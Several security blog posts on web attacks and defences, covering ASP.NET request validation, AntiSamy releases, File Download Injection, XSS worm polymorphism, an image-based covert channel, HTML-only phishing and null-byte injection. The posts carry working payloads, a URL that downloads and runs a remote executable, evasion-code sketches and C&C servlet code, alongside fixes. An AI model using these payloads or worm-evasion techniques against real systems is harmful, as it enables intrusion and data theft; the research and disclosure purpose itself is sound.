omg.wtf.bbq.

because arshan’s too cheap to license OneNote


I caught up with Michael Eddington’s short and sweet analysis of the request validation in ASP.NET 2.0. So far I’ve seen a few people blast it, but I think it will actually help ASP.NET security against XSS in general, thanks to the Pareto principle (also called the 80/20 rule). I’ll quickly summarize Mike’s post and the situation in general.

ASP.NET 1.1 had relatively strong blacklist protection against XSS turned on by default. There were a few ways discovered to get around the blacklist, but after the hotfixes were released it seemed pretty strong. It was, however, too strong for its own good. It "catches" so much that developers frequently turn it off. Anecdotally, I can say that most (70-80%) of the ASP.NET applications I look at explicitly disable the feature.

Then, in ASP.NET 2.0, Microsoft dumbed down the request validation significantly. To quote Mr. Eddington:

While asp.net v2.0 and higher performs the following:

  1. Look for &#
  2. Look for ‘<’ then alphas or ! or / (tags)
  3. Skip elements with names prefixed with double underscore (__)

So, after thinking about this for about 30 seconds we can at least see that they’re vulnerable to the following types of attacks:

  • Attribute-based XSS (injecting into an attribute)
  • JavaScript-based XSS (injecting into JavaScript)
  • UTF7/US-ASCII encoded attacks
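
To make the first one concrete: a classic attribute-breaking payload (assuming your input lands unencoded inside a quoted attribute value) sails right through those three checks, since it contains neither "&#" nor a "<":

" onmouseover="alert(document.cookie)

No tag, no entity prefix – request validation never fires.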

So this is a step backwards for Microsoft right? Were they just munching on FAIL cookies?

Microsoft developers fail?

They no longer look for event handlers, expression calls, etc. This is great for attackers, right? This means that I can focus more on improving my Halo 3 scores and banging that Michelle chick in GTA IV since XSS is now much easier to perform? Well, those are very important goals, but I think the truth is that this helps Microsoft customers reduce the number of XSS incidents they’ll have.

Let’s think about the facts:

  1. The validation strength in ASP.NET 1.1 was very strong
  2. Most everybody turned off request validation in ASP.NET 1.1
  3. The request validation in ASP.NET 2.0 is weaker than 1.1
  4. Most people will leave on request validation in ASP.NET 2.0

If this holds, the security will actually be better. The big assumption in my argument is #4: I'm assuming that because the 2.0 validation mechanism won't be as big a roadblock to developers, it will be left on. Developers may, though, simply turn it off out of habit.

Maybe I’m giving them too much credit, but I bet Microsoft analyzed the XSS vulnerabilities customers produced and found that some percentage, say 75%, were what I call “body” XSS vulnerabilities – those that are not attribute-based/JavaScript-based/DOM-based. So, the 80/20 rule comes into play. If they prevent “body” XSS vulnerabilities (I hate the name, please don’t use it), they eliminate 75% of the vulnerabilities. This is better than the 0% they were preventing before when developers were turning it off completely.

True, the ASP.NET validation, when looked at as an XSS validation mechanism without context, appears to be something Shooter McGavin would eat for breakfast since it doesn’t stop all attacks. However, in its new version, it will stop most of the attacks (the “body” XSS vulnerabilities) while not interfering with developers.

It seems like voodoo that they may actually improve their security by weakening it. Although, my question after writing this post is: what problems and legitimate test cases were developers hitting with request validation on? Should users legitimately be allowed to send in strangely encoded data or HTML tags? Sounds like Giorgio's problems with "false positives" in NoScript (hilarious read).

I’m happy to say there’s a new version of AntiSamy out today! There were many more changes between 1.1 and 1.1.1 than there were from 1.0 to 1.1! And I’m thrilled about that, if that makes any sense – it means that usage really grew! Many international users made requests and e-mailed fixes to the mailing list. Also, some other folks expressed interest in figuring out better and more consistent HTML entity translation. Hopefully everyone will be happy as I feel like I’ve addressed almost all of the open issues and even included a few enhancements. In the future, if you find a problem, I suggest you email the mailing list to get my attention, but also fill out an issue on the project issues page. You can test out the 1.1.1 version on the AntiSamy test page.

Also, as of the new 1.1.1 version, AntiSamy is being shipped with the OWASP ESAPI project – ESAPI can officially do everything now! Anyway, it’s ready for download from the project page. Here’s the official changelist:

  • Began using (X)HTMLSerializer instead of XMLSerializer to recognize HTML entities
  • Removed any invalid XML characters before processing in order to avoid XML exceptions (thanks to Gareth Heyes, Michael Coates, et al., who discovered this independently)
  • Fixed code to remove any lingering Java 1.5 dependencies (for real this time)
  • Cleaned up AntiSamy() main method to be a little more organized
  • Fixed the “dangling quote” scenario which could cause XSS if a getCleanHTML() call ended up inside a textbox value attribute
  • Added *true* XHTML support with a new directive in the policy file ("useXHTML")
  • Introduced the ability to specify encoding for input and output (will still rely on you setting your page charsets appropriately though)
  • Made the policy files tolerant of non-latin characters for i18n support
  • Removed automatic HTML entity translation support (HTML entities are international, ASCII character code points (e.g. &#160; ) aren’t)
  • Upgraded nekohtml to version 1.9.7
  • Upgraded Xerces to 2.9.1

Many thanks for all the help from those who spent their time since 1.1 making AntiSamy a better tool. I’d like to send extra special thanks to Joel Worral and Raziel Alvarez for their diligent research. I owe you guys much beer/wine/whatever you drink in your part of the world!

My boss Jeff Williams came up with something very clever while my company (Aspect Security) was participating in NIST's Static Analysis Tools Exposition (SATE). Basically, NIST challenged all the major static code analysis vendors to a massive bakeoff sponsored by DHS. Being a consulting company that mainly performs code reviews and penetration tests, we couldn't stand to sit on the sidelines while our portion of the industry was basically being written off like Dunder Mifflin. So Jeff sent a tongue-in-cheek letter suggesting that we be allowed to enter. The response from NIST was shockingly receptive – nice to know there's a part of NIST that I can still trust.
Anyway, in one of the bakeoff test applications, we found a piece of data that was run through a pretty good blacklist before being stuck into a Content-Disposition HTTP header. Great – that means header injection! But wait – we can't do XSS or response splitting because of the characters in the blacklist! What can we do?

The Attack

(Well, in the end we actually did come up with an XSS vector using UTF-7 and some other stuff, but forget about that for now.)

Here’s the Java code that’s vulnerable to HTTP header injection:

response.setContentType("application/octet-stream");
response.setHeader("Content-Disposition", "attachment; filename=" + request.getParameter("fn"));

Jeff's bright idea: pass in attack.bat%0d%0a%0d%0awordpad

Let’s look at the layout of the resulting HTTP response when we pass that in:

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:02:24 GMT
Server: Apache
Set-Cookie: JSESSIONID=E35E52B9472B17666B3A77C19CDCD90E; Path=/download
Content-Disposition: attachment;filename=attack.bat

wordpad
Content-Length: 0
Content-Type: application/octet-stream;charset=euc-k

The attack code is the injected filename plus the "wordpad" line after the break. There aren't many special characters, and it's even more deadly than XSS – remote file execution! The user's browser downloads a file called "attack.bat", and kicks off a batch file containing whatever commands we want to execute. In the example we just kicked off wordpad. Notice that the remaining HTTP headers are included after our payload, but that doesn't seem to present any real problem we can think of, especially since we may be able to control the content length and exclude that stuff in most cases. Here's an example attack string that gets and executes a random executable off the net.

http://[trusted_domain]/download?fn=attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20mirror.aarnet.edu.au%0d%0awzinet95.exe
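
Decoded, the injected body is just this two-line batch file – the first line pipes an FTP "get" command into an anonymous ftp session, and the second runs whatever came down:

echo get /pub/winzip/wzinet95.exe|ftp -A mirror.aarnet.edu.au
wzinet95.exe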

There's a downside for attackers here, though – if you try to kick off any kind of executable file extension, the browser pops up a warning. However, because the link resides on a trusted domain, it remains a very effective attack. Response splitting can result in a mass-effect cache poison, but File Download Injection is a non-theoretical, low-tech attack with a very realistic chance of being exploited (now that the attackers know about it – thanks, Jeff). So, the advice stays the same: don't click on anything, ever, despite any promises of nudey pictures of Jenna Fischer.

There's more you can do besides forge a quick batch file, too. Some of the extensions get kicked off automatically (no popup warning), like QuickTime's .mov. But because this is a reflected link attack, the "body" of the file you want the user to download has to be relatively small, since the whole thing must be contained in the malicious URL. IE has a maximum of 2,083 characters in a URL, but a massive URL is a problem more because it will look suspicious than because of any exploitability constraints. With that said, there's a host of platforms, browsers, and file extensions that haven't been tested – so after some research you might find a deadlier extension than .bat.
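
By the way, the developer-side fix is the boring, usual one: never let raw user input anywhere near an HTTP header. A minimal sketch of a safe version of the earlier code (the whitelist and length limit are my choices, not gospel):

import java.io.IOException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class SafeDownload {
    // Whitelist the filename so CR/LF (or anything else weird) can never
    // reach the Content-Disposition header.
    static void download(HttpServletRequest request, HttpServletResponse response) throws IOException {
        String fn = request.getParameter("fn");
        if (fn == null || !fn.matches("[A-Za-z0-9._-]{1,64}")) {
            response.sendError(HttpServletResponse.SC_BAD_REQUEST, "bad filename");
            return;
        }
        response.setContentType("application/octet-stream");
        response.setHeader("Content-Disposition", "attachment; filename=" + fn);
    }
}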

How does this relate to XSS?

The pattern is close – bad input in, bad input out. If bad input ends up in an HTTP header, you can do this. If it ends up in an HTTP response body, you just have XSS. File Download Injection has a higher impact and a lower likelihood than XSS. The impact is easy to calculate – compare the impact of JavaScript injection vs. the impact of remote arbitrary command execution. However, that's balanced by the fact that users have to ignore a pop-up warning, which lowers the chances of a successful attack. So in the end, I think this will end up rating the same risk as traditional header injection/XSS findings.

Even though I think this is a pretty neat addition to the attacker's toolbelt, Jeff's release landed with a resounding thud when he published it in places such as Bugtraq, the webappsec mailing list, and others. Maybe, in hindsight, publishing during RSA was not the best time. At least Arian Evans said some nice stuff about it, and echoed my sentiments exactly when he said we should stop calling HTTP header injection by its least likely attack variant, HTTP response splitting. While we're on that subject, we should also stop calling XSS by its current name – it's JavaScript injection. What the hell is cross-site scripting, anyway? JSI is just as sexy an acronym as XSS, and it actually makes sense. Until next time!

This is your everyday, ticket-serving Amtrak kiosk. Look familiar?

I love taking the train. God, the only thing better than taking the train would be taking the train for free.

Whoops. Thanks for the ticket, Marge Power, traveling from Alexandria, VA.

How was I able to do this? Direct object references (DOR). Laughably, ridiculously easy attacks. Is this a Diebold product? It's no wonder that with this level of security, a 14-year-old kid from Kerplakistan with a pasta drainer, wireless mouse and a shoebox was able to completely derail their trains. I've told my webappsec classes that the easiest way to steal a bunch of information from a website is through direct object references. My wife could perform a DOR attack, and if you think she knows anything about security, I can just tell you she has like 5,000 Facebook applications with full privileges running.

So, let's get to the really gory, technical details of this Mitnick-like hack.

My confirmation number was 01CF01.

I typed in 01CF04.

Maybe it was by accident, Amtrak, and maybe it wasn’t. Regardless, I got Marge’s ticket offered to me. Look at the screen again. See the “Print Tickets” option? I’m sure this does happen all the time by accident. Whoever made this horribly insecure contraption knew that, too, because on the first picture, if you look closely, there’s a “Not you? Click here to try another confirmation number” button as well. You don’t need an ID to board a train, remember.

Incidentally, Marge Power is such a badass name. That’s why I didn’t get her tickets out. She sounds ripped. Anyway, imagine the same kind of functionality on a website:

http://bank.com/viewProfile?accountID=101

Hrm. How about 102? Or:

http://bank.com/viewReport?file=arshan.pdf

Hrm. How about ../../../../etc/passwd? When we learn to program, we're not taught security. We're taught to pass our test cases and include as much functionality as we can. Maybe we could sneak a little blurb about data ownership into the curriculum, say, instead of DFDs or UML or anything else that 90% of web developers never use? Even harder than teaching doe-eyed comp sci students security is the prospect of first teaching their stuffy old professors about it.
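
For what it's worth, the fix is conceptually tiny – check ownership before serving the object. A hedged sketch in Java (the class, session attribute, and lookup are all mine, invented for illustration):

import java.io.IOException;
import java.util.Collections;
import java.util.Set;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class ViewProfileSketch {
    // Hypothetical lookup – a real app would query the database.
    static Set<String> accountsOwnedBy(String user) {
        return Collections.singleton("101");
    }

    static void viewProfile(HttpServletRequest request, HttpServletResponse response) throws IOException {
        String accountId = request.getParameter("accountID");
        String user = (String) request.getSession().getAttribute("user"); // hypothetical session attribute
        // The entire fix: verify the session's user owns the requested object,
        // instead of trusting the client-supplied identifier.
        if (user == null || !accountsOwnedBy(user).contains(accountId)) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN);
            return;
        }
        // ...render the profile for accountId...
    }
}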

Anyway, hope your March Madness brackets are doing well. I have my alma maters Towson University and Essex Community College meeting in the final, with Essex snatching the victory in classic underdog fashion from Towson in triple overtime – on a jumper from some 19-year-old father of 2, making the end score 45-44. Sure, neither were in the tournament, but you know how those later rounds are weighted. If I nail the final I'm taking home the dough.

I’m happy to say that the OWASP AntiSamy 1.1 Java API is officially out! Thanks to everyone on the OWASP AntiSamy mailing list for helping me get a better API out the door. There were really only 5-6 changes worth getting excited about. Here are the highlights:

  • Removed accidentally included internal Sun JRE classes (com.sun.*) and replaced them with Xerces classes. This fixes the NoClassDefFoundError you'd encounter on non-Sun JREs (like in IBM WebSphere)
  • Re-factored code to remove reliance on setUserData() method to allow the code to run in Java 1.4
  • Escaped '#' in onsiteURI regular expressions to address a known bug in the JVM which interpreted the hash mark as a comment character inside character class definitions, e.g. [0-9A-Z,/#]. This flaw allowed otherwise disallowed protocol URLs through (credits to Richard Rodger of Ricebridge Software for discovering this)
  • Changed code comment accidentally crediting HTMLCleaner with the cleaning – should be NekoHTML!
  • Also, we’ve got the JavaDocs online at Google!

The API is in a good place, and it’s getting the attention of a lot of people. I said from the beginning that if 10 people found AntiSamy useful I’d consider it a success. Considering the thousands of times AntiSamy materials have been downloaded, I really couldn’t be happier about how things have turned out.

However, I don't want to stay in just the Java world. Early goals for AntiSamy included getting a .NET and PHP version ready by Spring 2008 – that's still very possible, but not without help. Luckily, it appears that Stas Malyshev from the Zend group (think OWASP Incorporated, mega-focused on PHP) is looking to start the project. I planned to do the .NET version but I've been mega busy with other research. Hopefully I can find some OWASP Summer of Code money to get this done! Anybody from the OWASP .NET project feel like collaborating?

One of the cooler tools in the webappsec hacker’s handbook is Hackvertor. It’s a smart encoding tool written by Gareth Heyes that helps you craft XSS vectors that pass whatever filters you’re trying to evade. Rather than wasting 3 paragraphs describing it, you should just go try out this example that Gareth showed me for obfuscating a simple alert(document.cookie). Check out the Hackvertlet and HVURL features!

Anyway, for obfuscating a single payload to bypass a filter, Hackvertor is excellent. However, my recent research into next-generation XSS worms demands more of its polymorphic capabilities. For example, although a single obfuscated payload (a la Samy's worm code) can propagate all over an infected application, that application is extremely easy to clean with a simple search-and-destroy on the payload code.

I call this type of worm a "Teflon worm". Get it? Teflon's easy to clean. If you don't think that's funny, you should read it again and reconsider. If you still don't think it's funny, listen to this mp3 and let me take credit for being funny by association.

To avoid that easy-to-clean Teflon type of payload we need a polymorphic worm that has different payloads. However, they can’t just be different. They have to be difficult to signature. So, a payload that goes from stealCookie24(document.cookie) to stealCookie25(document.cookie) is an improvement, but it’s still not great because the payloads generated will be easy to signature. Really, any deterministic algorithm for shifting payloads will be easy to signature after some analysis.

Another problem with Hackvertor-generated payloads is that they still contain strings that would commonly be blacklisted, such as document.cookie. These issues shouldn't be considered "weaknesses" in Hackvertor; the polymorphing a good worm needs from infection to infection is one contextual level up from Hackvertor, and bypassing a blacklist is not, in and of itself, a challenge you need Hackvertor for. However, the tool would be much more useful if it automatically fragmented and re-assembled these keywords (perhaps any literal string in the payload).

The goal is not just obfuscation, but actively camouflaging our data among other users' data. To do that, we're going to need a non-deterministic method of expressing a JavaScript "idea". Assuming Hackvertor is the tool to help us make this happen, here are 3 key ways we can move it toward that destination:

Combining and Layering

A real polymorphic algorithm will randomly combine and layer multiple encoding transformations on the payload. This doesn’t mean you just take 5 algorithms and run the payload through 3 of them. This means looping through a random number of iterations, taking randomly sized substrings of the payload and running them through multiple layers of encoding.
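
A rough sketch of that loop in Java (the two toy encoders stand in for a real transformation library, and a real worm would also have to emit matching inline decoders):

import java.util.Arrays;
import java.util.List;
import java.util.Random;
import java.util.function.Function;

public class LayeringSketch {
    static final Random rng = new Random();

    // Toy stand-ins for real encoding transformations.
    static final List<Function<String, String>> encoders = Arrays.asList(
        s -> {
            StringBuilder b = new StringBuilder();
            for (char c : s.toCharArray()) b.append(String.format("\\u%04x", (int) c));
            return b.toString();
        },
        s -> new StringBuilder(s).reverse().toString()
    );

    static String layer(String payload) {
        int rounds = 2 + rng.nextInt(4); // random number of iterations
        for (int i = 0; i < rounds; i++) {
            // take a randomly sized substring...
            int start = rng.nextInt(payload.length());
            int end = start + 1 + rng.nextInt(payload.length() - start);
            // ...and run just that slice through a randomly chosen encoder
            String slice = encoders.get(rng.nextInt(encoders.size())).apply(payload.substring(start, end));
            payload = payload.substring(0, start) + slice + payload.substring(end);
        }
        return payload; // two runs on the same input rarely look alike
    }
}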

Random Expressiveness

Encoding is one way of performing transformations. Another way of performing transformations is altering the expressions of full or partial JavaScript statements. An example transformation would turn “alert(” into “alert (“. Another transformation would take that statement and turn it into “/*ZXC*/alert (“. Because of the expressiveness of JavaScript, you could create hundreds of these types of transformations.
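
In code, this is just a table of meaning-preserving rewrites applied at random. A toy Java sketch (two transformations instead of hundreds):

import java.util.Random;

public class ExpressivenessSketch {
    static final Random rng = new Random();

    static String randomComment() {
        StringBuilder b = new StringBuilder("/*");
        for (int i = 0; i < 3; i++) b.append((char) ('A' + rng.nextInt(26)));
        return b.append("*/").toString();
    }

    // Each rewrite changes the JavaScript's appearance, never its meaning.
    static String transform(String js) {
        if (rng.nextBoolean()) js = js.replace("alert(", "alert (");
        if (rng.nextBoolean()) js = randomComment() + js;
        return js;
    }

    public static void main(String[] args) {
        System.out.println(transform("alert(1)")); // e.g. /*QZC*/alert (1)
    }
}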

Out-of-order String Fragmenting

One of the failures of many of the encoders I see is that when they fragment keywords to avoid blacklists, they fragment them in a way that is easy to see through for a computer. For example, take these two pieces of Samy’s exploit code:

  1. eval('document.body.inne'+'rHTML')
  2. eval('J.onr'+'eadystatechange=BI')

Can you use this fragmenting technique to beat any blacklist? Not a 3-D blacklist. Let’s run these things through a filter that removes everything that’s not alphanumeric. The results: evaldocumentbodyinnerHTML and evalJonreadystatechangeBI – and now our blacklist works again. I call this technique a 3-D blacklist because it gives depth to data. It’s an absolutely terrible mechanism and easily beatable, but it would work today because nobody’s trying to beat it. The way to beat it? Don’t fragment your bad words in order. Reverse the order, make it random, etc.
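
Here's a toy Java generator for the idea (mine, not Samy's): chop the keyword into random chunks, declare the chunks in shuffled order, then reassemble by variable name. The alphanumeric residue never contains the keyword as a contiguous run, so the 3-D blacklist above goes blind:

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Random;

public class FragmentSketch {
    static final Random rng = new Random();

    static String fragment(String keyword) {
        // chop the keyword into 2-4 character chunks
        List<String> chunks = new ArrayList<>();
        for (int i = 0; i < keyword.length(); ) {
            int n = Math.min(2 + rng.nextInt(3), keyword.length() - i);
            chunks.add(keyword.substring(i, i + n));
            i += n;
        }
        // declare the chunks in shuffled (out-of-) order
        List<Integer> order = new ArrayList<>();
        for (int i = 0; i < chunks.size(); i++) order.add(i);
        Collections.shuffle(order, rng);
        StringBuilder js = new StringBuilder();
        for (int idx : order) js.append("var f").append(idx).append("='").append(chunks.get(idx)).append("';");
        // reassemble in the right order by name
        js.append("var k=");
        for (int i = 0; i < chunks.size(); i++) js.append(i == 0 ? "f" : "+f").append(i);
        return js.append(";").toString();
    }

    public static void main(String[] args) {
        System.out.println(fragment("cookie")); // e.g. var f1='kie';var f0='coo';var k=f0+f1;
    }
}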

Whenever I teach a class on webappsec, I mention Samy's worm. Of the whole thing, his fragmenting technique is the piece that seems to impress the students most. It's simultaneously very simple and very clever. Once I'm done breaking down the worm, however, I let them know how ugly Samy is, to quickly prevent his already out-of-control fan club from growing any more. Okay, I don't tell them he's ugly – only because everyone who saw us at OWASP San Jose kept saying we looked alike. Jeff Williams found a picture showing how Samy looks much more like Vladimir Lenin, which, by the transitive nature of comparison, means I look like Lenin. You be the judge:

samy, lenin, then me (and my mail order bride Jen).

Anyway, Gareth has told me he will be implementing these features in the future and that we should keep an eye on his blog. The next great XSS worm can’t be easy to signature, so this is important research.

In closing, go Liverpool!

I am submitting a paper for Blackhat USA and the OWASP Belgium and NYC conferences. These are exciting times. Blackhat is always cool, Belgium is far away, and I know Tom Brennan will put on a great show in NYC. The title of the paper, which I'm not glued to yet, is "Building And Mitigating Next-Gen XSS Worms: Techniques in Attacking and Defending in Web 2.0". If that doesn't work, I may rely on my safety paper: "Brokeback XSS: Why Jeremiah and Robert Can't Quit Each Other, or XSS". Anyway, here's the abstract of the paper I'm proposing:

“There has been much analysis of the recent MySpace and Yahoo! cross-site scripting worms. While the web development world slowly comes to recognize self-propagating web attacks, attackers are in the wild, presumably improving on the work of their predecessors.

In this paper we will analyze the design choices made by past worm authors and hopefully illuminate how future attackers will improve on the current paradigm when building the next generation of cross-site scripting worms. Also, the paper will highlight some new defense mechanisms in both preventing current and next generation cross-site scripting worms, and include some original recommendations on how to respond to such attacks.”

Abstracts don’t really say a whole lot. Not to give it all away, but some of the topics will include:

  • dynamic XSS command-and-control channels
  • egress malware filtering rules
  • polymorphic payload code
  • content restrictions
  • distributed scanning

I plan on finishing the paper within the next 2 weeks and I also plan on getting it accepted. If it isn't, I'll have plenty of blogging material, but I think this is stuff a lot of the webappsec community will find very interesting.

Also, Sarah: I’m sorry you hate my blog. But there’s one thing you can’t deny.

There has been a lot of research into ways of getting around the same origin policy. What if the browser sandbox we're all trying to figure out how to implement prevents you from adding various tags into the DOM dynamically? I imagine a common "sandbox" would prevent bad guys from dynamically inserting <script>, <link>, and <iframe> elements into the DOM. Is there anything else we could do to bypass the same origin policy? That's the question (or what it turned into as I explored it the other day) I was asking when trying to figure out an XSS worm C&C channel in a post-content-restrictions world.

Disclaimer: I know this isn’t earth-shattering now when the sandbox isn’t there, but I think it’s cool that using image tags we can create a completely covert channel for bypassing the same origin policy and control browsers remotely. Just to be clear, this is not a traditional same-origin bypass where we’re on http://evil.com/ and we’re talking to http://mybank.com/. We’re talking about a hijacked client who’s in collusion with an evil server that wants to deliver the client some message, be it a code payload, instructions, etc. Can we restrict JavaScript from dynamically loading image tags? No more image pre-loading? I doubt it!

Here’s how it works.

  • Client dynamically creates an Image() and points the source to http://evil.com/evil.cgi?password=somesecret
  • Server responds with an image that is 16 pixels tall and 1 pixel wide (the 16, in this handshake phase, is the total length of the payload)
  • Client then starts a loop that iterates 16/2 times:
    • Client dynamically creates a new Image() and points the source to http://evil.com/evil.cgi?password=somesecret&i=<loop_index>
    • The returned image has height x and width y
    • Client appends ASCII character value of x onto payload string
    • Client appends ASCII character value of y onto payload string
  • Client now has authenticated, 16-length payload to do whatever they want with
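
To make the protocol concrete, here's a hedged Java servlet rendition of the server half (the real POC linked below is CGI; the class name, payload, and parameter handling are all mine):

import java.awt.image.BufferedImage;
import java.io.IOException;
import javax.imageio.ImageIO;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class CovertImageServlet extends HttpServlet {
    // Hypothetical 16-character payload; pad to an even length, since each image carries two characters.
    static final String PAYLOAD = "alert('owned');!";

    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        // (a real version would also verify the password parameter here)
        String i = req.getParameter("i");
        int w, h;
        if (i == null) {
            // handshake image: the height announces the total payload length
            w = 1;
            h = PAYLOAD.length();
        } else {
            // image i smuggles payload characters 2i and 2i+1 as its height and width
            int idx = 2 * Integer.parseInt(i);
            h = PAYLOAD.charAt(idx);
            w = PAYLOAD.charAt(idx + 1);
        }
        resp.setContentType("image/png");
        ImageIO.write(new BufferedImage(w, h, BufferedImage.TYPE_INT_RGB), "png", resp.getOutputStream());
    }
}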

Payloads can be of arbitrary length and transfer surprisingly fast. The client side code for the POC is here, and the server side code is here. To verify the POC in Firefox, go to the client side page, let it finish loading (it goes quick), and then type "javascript:alert(payload)" in the address bar. This hasn't been tested in IE, but whatever. Same thing. If I were malicious I'd spruce it up with some shimmering/port knocking style authentication on the malicious server. The good news for attackers is there will probably always be ways of getting around the same origin policy using techniques like this to distribute payloads. As far as getting arbitrary off-domain data goes – shrug – screwing up the implementation is always possible.

On this topic, my boss Jeff Williams pointed me to a neat paper about improving the reliability of the SOP implementation in IE using a technique called Script Accenting. I haven't heard much about it out on the Interwebs besides a brief analysis on RSnake's site. It's really effective for preventing cross-frame SOP violations, but not for scripts that were injected using XSS. Either way, it's a great read, but I'm not 100% convinced of its reliability – something about using XOR as a security mechanism, even with their well-reasoned defenses, tickles my Spidersense as being a shaky precipice.

Anyways, happy January!

One of the things I highlighted in my paper on AntiSamy was the fact that JavaScript is often the only thing we think of when we hear the term “malicious code” in terms of webappsec. Let’s suppose that’s false for a second. The question then becomes: If MySpace can strip out all your JavaScript, what can you do maliciously when only providing pure HTML/CSS (besides invoking JavaScript from intrinsic events, CSS image-lookups, hilarious 3rd-party stupidity, etc.)? Also, we’re ignoring all the obvious meta-iframe-redirect-to-malware type stuff.

Here are the 3 things I came up with. Two are original.

1. <div> overlay affecting phishing attacks

These are pretty old hat too. The idea here is you provide some CSS in the part of the page that you supply that creates a <div> that overlays some or all of the page, including the part you don’t own. To see this kind of attack in action, try sticking the following code onto my AntiSamy test page, and make sure you attack against the default/vulnerable antisamy.xml policy file:

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Welcome to MyGoat!!1! Please Login wit credentialz for major nigerian cash<br><form name="login" action="http://aspectsecurity.com"><table><tr><td>Username: </td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

2. <div> hijacking

So, if you're interested in this stuff, you're probably a hacker. I can surmise, then, that you're lazy and have criminal inclinations. Am I projecting? Hope not. Assuming you are – well, why create an absolutely positioned <div> when you can just steal the existing one? Let's say that MySpace has this code at the top of their page:

<div id="main_logo"> <img src="/main_logo.gif"> </div>

Then, the attacker’s profile comes along later and let’s say they supplied this:

<div id="main_logo"> <img src="http://evil.tld/hacked.gif"> </div>

Guess what comes up where the main logo appears? Well, don’t take my word for it. Go try it out on my test page. Provide the following attack code and watch the header image carefully:

<style>
div#header * {
  display: none;
}
div#header {
  background-image: url(http://www.aspectsecurity.com/images/footer_aybabtu.jpg);
  background-repeat: no-repeat;
  width: 800px;
  height: 60px;
}
</style>

Ugh, this turns out to be pretty problematic when you think it through. So, if we want to allow users to create their own <div> tags, we have to allow them to specify id values so they don’t have to write annoying inline CSS for everything. On the other hand – if we allow users to specify the id attribute, they could use it to hijack our legitimate <div> areas.

What a pickle. AntiSamy “solves” this problem by allowing the application to specify “protected” id values. So, you can setup a list of specific id values that are protected or you can specify a pattern, like “myspace_*”. So, if the user tries to specify an id that begins with “myspace_”, they’ll get an error. This means your developers have to be aware of the naming convention and be on board with its purpose.

Can it get worse? 

3. <base> external resource hijacking

Yes, it can. Well, phishing doesn’t really get me out of bed in the morning. That’s what Anna Faris is for. We’re here for something more. What’s great about this attack vector is the fact that it allows me to revive a gaming joke from 2001. The <base> tag tells browsers that all relative tag resources encountered from that point forward can be found beneath the URL in the <base> tag’s href attribute.  See where this is going? It plays out like this.

<!-- begin user supplied content (eBay) -->
omFG bai my boba fett dollz it totally sets u UP the bombz
<base href="http://evil.tld">
<!-- end user supplied content (eBay) -->
<script src="/do_ebay_stuff.js"></script>

When the browser encounters the <script> tag, it’s going to try to find it at http://evil.tld/do_ebay_stuff.js. So, all you have to do is make sure there’s something malicious living at that URL and you’re disco.

Couple of things about this attack:

  • It’s pure HTML. Awesome.
  • Like a remote script/CSS include, the application has no idea what malicious code the victim was tricked into executing. Double awesome. The code is in the cloud, baby.
  • It's an original vector. RSnake has this similar-looking vector on his cheat sheet: <BASE href="javascript:alert('XSS');//">. This is a localized JavaScript call because browsers were too dumb to realize this URL doesn't make any sense (and this doesn't even work anymore).
  • Browsers can’t patch it!
  • IE7 has decided it won’t honor <base> tags it finds outside of the <head> element, so IE7 is probably not a concern for this vector because it’s unlikely that untrusted users will be injecting into a page’s <head> element. Making a dirty joke about this bullet is left as an exercise to the reader.

Legally, I’m not allowed to write this section without reminding you that someone set us up the bomb.


So, those are a few ideas for non-JavaScript malicious code. If you have anything to add, plz feel free to do so!

So my co-worker Eric Sheridan was talking about an attack scenario in one of our recent assessments where he left a note to the effect of, "we could download any file with this vulnerability if null byte injections work in Java – testing needed". Interesting. Five minutes later I've got some test cases and, as sure as I am a good-looking Persian man, the thing works. Am I an idiot? How did I not know this? Let's see if Google knew. If Google doesn't know, then I won't kill myself. Woohoo! Try plugging "java null byte injections" into Google. Absolutely nothing useful comes up.

Earlier this year, Paul Craig at security-assessment.com published his research on null byte injections in .NET. A natural step would be to go check Java next – managed language survey! Maybe somebody did and found nothing – it would have been easy to miss. Craig’s research found that 5 methods in the entire .NET framework mishandle the null byte. I’ve done some limited research and only found 2. However, I’m sure there are more. So, let’s look at some vulnerable code:

String path_to_file = request.getParameter("target") + ".xls";
File f = new File(path_to_file);
deliver_to_user(contentsOf(f));

In similar PHP/C/C++ code we'd be quick to use the infamous poison null byte (whose history can be found here and here) to view any arbitrary file on the system. But it also works in Java, because File(file_path) passes the user input down to open(2) or its Windows equivalent, which is written in C. It's unclear whether the Java VM (which is written in C/ASM) is where the content after the null byte gets truncated, or if the dirty string makes it all the way to the system call itself.
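
If you want to see it for yourself, a test case is tiny (hedged: this shows the vulnerable behavior as of this writing – newer JREs reject embedded NUL bytes, so a patched JVM will throw or return false instead). Against the vulnerable code above, an attacker would just send target=../../../../etc/passwd%00 so that the appended ".xls" lands after the null:

import java.io.File;

public class NullByteTest {
    public static void main(String[] args) {
        // On a vulnerable JRE, everything from the embedded NUL onward is
        // silently dropped on the way to the native open() call, so this
        // reports on /etc/passwd itself despite the ".xls" suffix.
        File f = new File("/etc/passwd\u0000.xls");
        System.out.println(f.getPath() + " exists? " + f.exists());
    }
}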

As Eric pointed out, these unmanaged code issues keep haunting us, but overall of course the situation is a lot better. Anyway, check out my test cases and if you can think of additions or find a new vulnerable API, keep everyone in the loop with a comment! Also, keep an eye on the next WebGoat version as Eric has cooked up a null byte lesson.

Cheers!

Bonus game: Who will win the know-it-all/complete liar award by posting that they knew this 5 years ago?